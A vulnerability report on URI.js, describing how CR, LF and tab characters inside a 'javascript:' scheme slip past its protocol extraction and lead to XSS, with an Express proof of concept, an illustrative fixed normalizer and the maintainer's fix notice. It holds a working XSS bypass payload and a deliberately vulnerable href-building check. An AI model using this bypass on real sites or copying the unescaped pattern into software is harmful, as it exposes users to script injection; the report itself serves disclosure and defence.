CRHTLF can lead to invalid protocol extraction potentially leading to XSS in medialize/uri.js
Reported on
Mar 18th 2022
Description
\r, \n and \t characters in a URI can lead to XSS because URI.js fails to extract the javascript: protocol from such a URI, while browsers strip those characters before parsing. See Section 4.4, step 3, "Remove all ASCII tab or newline from input." of the WHATWG URL spec.
Proof of Concept
const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000
// CR and LF inside the scheme: browsers remove them, URI.js (before the fix) does not
const input = "ja\r\nvascript:alert(1)"
const url = parse(input)
console.log(url)
app.get('/', (req, res) => {
  // URI.js exposes the scheme through the protocol() accessor, without the trailing colon.
  // For the unstripped input it returns "" instead of "javascript", so this check passes
  // and the raw input is rendered into the href.
  if (url.protocol() !== "javascript") {res.send("<a href=\'" + input + "\'>CLICK ME!</a>")}
})
app.listen(port, () => {
  console.log(`Example app listening on port ${port}`)
})
Run the above and click on CLICK ME: applications that use URI.js to check for the javascript: protocol are still vulnerable to XSS, because the browser strips the CR/LF and executes the link as javascript:.
Impact
This vulnerability is capable of incorrect protocol extraction potentially leading to XSS.
Occurrences
URI.js L13-L53
The \r, \n and \t characters should be removed from the input before parsing.
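As an added illustration (not URI.js's own code), the following models the check used in the PoC above and the fix recommended here: a simplified scheme extractor without the WHATWG tab/newline removal, the same extractor after that pre-processing step, and the difference this makes for the report's input. The scheme regex, the function names and the allow-list are assumptions made for this example.

```javascript
// Added example, not code from URI.js: a simplified model of scheme
// extraction with and without the WHATWG URL spec pre-processing
// (section 4.4, step 3: remove all ASCII tab or newline from input).

// Scheme syntax: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ).
const SCHEME_RE = /^[a-z][a-z0-9+.-]*$/i;

// Model of a parser that takes the text before the first ':' as the scheme
// and discards it when it is not syntactically a scheme. With no stripping,
// "ja\r\nvascript:..." yields no scheme at all, so a "!== javascript"
// check passes even though a browser will run the link as javascript:.
function naiveScheme(input) {
  const pos = input.indexOf(':');
  if (pos < 1) return null;
  const candidate = input.slice(0, pos);
  return SCHEME_RE.test(candidate) ? candidate.toLowerCase() : null;
}

// WHATWG basic URL parser pre-processing: strip leading/trailing C0 control
// or space, then remove every ASCII tab, LF and CR anywhere in the input.
function normalizeUrlInput(input) {
  return input
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// The fixed behaviour: normalize first, then extract the scheme.
function safeScheme(input) {
  return naiveScheme(normalizeUrlInput(input));
}

// Deny-list check in the shape of the PoC (the vulnerable pattern).
function naiveCheckAllowsHref(input) {
  return naiveScheme(input) !== 'javascript';
}

// Allow-list check on the normalized scheme (the recommended pattern).
// An input with no scheme after normalization is a relative reference,
// which the browser resolves against the page's own origin.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
function safeCheckAllowsHref(input) {
  const scheme = safeScheme(input);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}
```

The scheme check is in addition to, not a replacement for, HTML attribute encoding of the value: the PoC also concatenates the raw input into the href attribute, which a quote character would break out of regardless of the scheme.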
Thank you for reporting the issue. It has been solved and released as v1.19.11.
The researcher has requested a CVE here.
Can I go ahead and assign and publish one @maintainer?